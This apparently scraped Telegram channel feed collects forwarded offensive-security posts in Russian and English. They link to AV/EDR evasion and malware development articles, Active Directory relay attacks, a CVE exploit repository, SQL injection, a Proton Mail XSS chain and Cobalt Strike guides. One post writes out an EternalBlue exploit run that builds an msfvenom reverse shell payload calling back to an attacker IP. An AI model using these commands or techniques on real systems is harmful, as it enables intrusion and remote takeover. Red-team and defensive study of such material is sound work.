Forwarded from Offensive Xwitter
😈 [ Clandestine @akaclandestine ]
𝘼𝙑/𝙀𝘿𝙍 𝙀𝙫𝙖𝙨𝙞𝙤𝙣 | 𝙈𝙖𝙡𝙬𝙖𝙧𝙚 𝘿𝙚𝙫𝙚𝙡𝙤𝙥𝙢𝙚𝙣𝙩 👾
🔗 Part 1 - https://medium.com/@0xHossam/av-edr-evasion-malware-development-933e50f47af5
🔗 Part 2 - https://medium.com/@0xHossam/av-edr-evasion-malware-development-p2-7a947f7db354
🔗 Part 3 - https://medium.com/@0xHossam/unhooking-memory-object-hiding-3229b75618f7
🔗 Part 4 - https://medium.com/@0xHossam/av-edr-evasion-malware-development-p-4-162662bb630e
🐥 [ tweet ]
𝘼𝙑/𝙀𝘿𝙍 𝙀𝙫𝙖𝙨𝙞𝙤𝙣 | 𝙈𝙖𝙡𝙬𝙖𝙧𝙚 𝘿𝙚𝙫𝙚𝙡𝙤𝙥𝙢𝙚𝙣𝙩 👾
🔗 Part 1 - https://medium.com/@0xHossam/av-edr-evasion-malware-development-933e50f47af5
🔗 Part 2 - https://medium.com/@0xHossam/av-edr-evasion-malware-development-p2-7a947f7db354
🔗 Part 3 - https://medium.com/@0xHossam/unhooking-memory-object-hiding-3229b75618f7
🔗 Part 4 - https://medium.com/@0xHossam/av-edr-evasion-malware-development-p-4-162662bb630e
🐥 [ tweet ]
pentest-book/others/internal-pentest.md at master · six2dez/pentest-book · GitHub
https://github.com/six2dez/pentest-book/blob/master/others/internal-pentest.md
https://github.com/six2dez/pentest-book/blob/master/others/internal-pentest.md
GitHub
pentest-book/others/internal-pentest.md at master · six2dez/pentest-book
Contribute to six2dez/pentest-book development by creating an account on GitHub.
Forwarded from Pavel Cherepanov
Forwarded from Offensive Xwitter
😈 [ ShorSec Cyber Security @ShorSecLtd ]
🔥New Blog Post Alert!
The next chapter in our "The Path to DA" series is now live: "(Relaying) To The Internet And Back".
This entry, by @dec0ne, explores yet another route to DA, focusing on the intricacies of ADIDNS Abuse, LDAP relay, RBCD, and more.
🔗 https://shorsec.io/blog/the-path-to-da-part-2-relaying-to-the-internet-and-back/
🐥 [ tweet ]
🔥New Blog Post Alert!
The next chapter in our "The Path to DA" series is now live: "(Relaying) To The Internet And Back".
This entry, by @dec0ne, explores yet another route to DA, focusing on the intricacies of ADIDNS Abuse, LDAP relay, RBCD, and more.
🔗 https://shorsec.io/blog/the-path-to-da-part-2-relaying-to-the-internet-and-back/
🐥 [ tweet ]
Forwarded from D3R7K1K
https://github.com/Wh04m1001/CVE-2023-36874 ребят а как из исходников это собрать без sln
GitHub
GitHub - Wh04m1001/CVE-2023-36874
Contribute to Wh04m1001/CVE-2023-36874 development by creating an account on GitHub.
Exploit Java Deserialization | Discovering Insecure Deserialization
https://youtube.com/watch?v=lH2VNlf91pY&feature=shared
https://youtube.com/watch?v=lH2VNlf91pY&feature=shared
YouTube
Exploit Java Deserialization | Discovering Insecure Deserialization
Hi... It's been a while. Anyways, here's a new video!
This is the second in a three part series where we dissect Java deserialization vulnerabilities. Building off the last video, we discuss how to identify Java deserialization vulnerabilities from a blackbox…
This is the second in a three part series where we dissect Java deserialization vulnerabilities. Building off the last video, we discuss how to identify Java deserialization vulnerabilities from a blackbox…
Forwarded from Codeby
SQL-injection, UNION BASED - Быстрые техники
Приветствую тебя читатель! Надеюсь ты уже решил базовые задачки из предыдущей статьи. А сегодня я расскажу о более продвинутых техниках, позволяющих извлекать данные из баз гораздо быстрее. Данный подход называется DIOS (DUMP IN ONE SHOOT
📌 Читать далее
#sql #injection
Приветствую тебя читатель! Надеюсь ты уже решил базовые задачки из предыдущей статьи. А сегодня я расскажу о более продвинутых техниках, позволяющих извлекать данные из баз гораздо быстрее. Данный подход называется DIOS (DUMP IN ONE SHOOT
📌 Читать далее
#sql #injection
Forwarded from Aleksey
nasm -f bin eternalblue_kshellcode_x64.asm -o evilKernel.bin
msfvenom -p windows/x64/shell_reverse_tcp EXITFUNC=thread LHOST=10.14.57.233 LPORT=443 -f raw -o evilReverse.bin
cat evilKernel.bin evilReverse.bin > evilPayload.bin
python3 ../eternalblue_exploit7.py 10.10.118.242 evilPayload.bin 24
Done!
Forwarded from Cybred
https://www.sonarsource.com/blog/code-vulnerabilities-leak-emails-in-proton-mail/
Пятничное чтиво про сложные XSS в приватных почтовых сервисах Proton Mail, Skiff и Tutanota.
Описали пока только Proton Mail и цепочка выглядит так:
1. Обман Dom Purify, благодаря неправильному контексту с помощью тега
2. Побег из Sandbox Iframe из-за атрибута allow-noscripts, который "эксклюзивно" отображался для браузера Safari.
3. Обход CSP с крутой эксфильтрацией через blob и cross-fade() из CSS.
Все это приводит к тому, что, отправив сообщение жертве, атакующий может:
— прочитать ее электронные письма расшифрованном виде
— отправить электронные письма от её имени
— украсть криптографические ключи.
Пятничное чтиво про сложные XSS в приватных почтовых сервисах Proton Mail, Skiff и Tutanota.
Описали пока только Proton Mail и цепочка выглядит так:
1. Обман Dom Purify, благодаря неправильному контексту с помощью тега
<style> и тем, как он санитизирует его в HTML и SVG, а также последующей обработкой.2. Побег из Sandbox Iframe из-за атрибута allow-noscripts, который "эксклюзивно" отображался для браузера Safari.
3. Обход CSP с крутой эксфильтрацией через blob и cross-fade() из CSS.
Все это приводит к тому, что, отправив сообщение жертве, атакующий может:
— прочитать ее электронные письма расшифрованном виде
— отправить электронные письма от её имени
— украсть криптографические ключи.
Sonarsource
Code Vulnerabilities Put Proton Mails at Risk
The Sonar Research team discovered critical code vulnerabilities in Proton Mail, Skiff and Tutanota. This post covers the technical details of the XSS vulnerability in Proton Mail.
Forwarded from Deleted Account
Telegram
Freedom F0x
#redteam
Forwarded from Offensive Xwitter
Forwarded from Acrono
Cobalt Strike: полезные ссылки
Документация кобы
https://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/topics/welcome_main.htm
Cobalt Strike 101
https://www.ired.team/offensive-security/red-team-infrastructure/cobalt-strike-101-installation-and-interesting-commands
Red Team Ops with Cobalt Strike (ОЧЕНЬ рекомендую к просмотру!)
https://www.youtube.com/watch?v=q7VQeK533zI&list=PL9HO6M_MU2nfQ4kHSCzAQMqxQxH47d1no
Cobalt Strike CheatSheet
https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Cobalt%20Strike%20-%20Cheatsheet.md
Примеры использования кобы
https://impacttrial.coresecurity.com/docs/doc/walkthrough/cobaltstrike/cobalt_strike_walkthrough/
#coba #cobaltstrike #guide
Документация кобы
https://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/topics/welcome_main.htm
Cobalt Strike 101
https://www.ired.team/offensive-security/red-team-infrastructure/cobalt-strike-101-installation-and-interesting-commands
Red Team Ops with Cobalt Strike (ОЧЕНЬ рекомендую к просмотру!)
https://www.youtube.com/watch?v=q7VQeK533zI&list=PL9HO6M_MU2nfQ4kHSCzAQMqxQxH47d1no
Cobalt Strike CheatSheet
https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Cobalt%20Strike%20-%20Cheatsheet.md
Примеры использования кобы
https://impacttrial.coresecurity.com/docs/doc/walkthrough/cobaltstrike/cobalt_strike_walkthrough/
#coba #cobaltstrike #guide
www.ired.team
Cobalt Strike 101 | Red Team Notes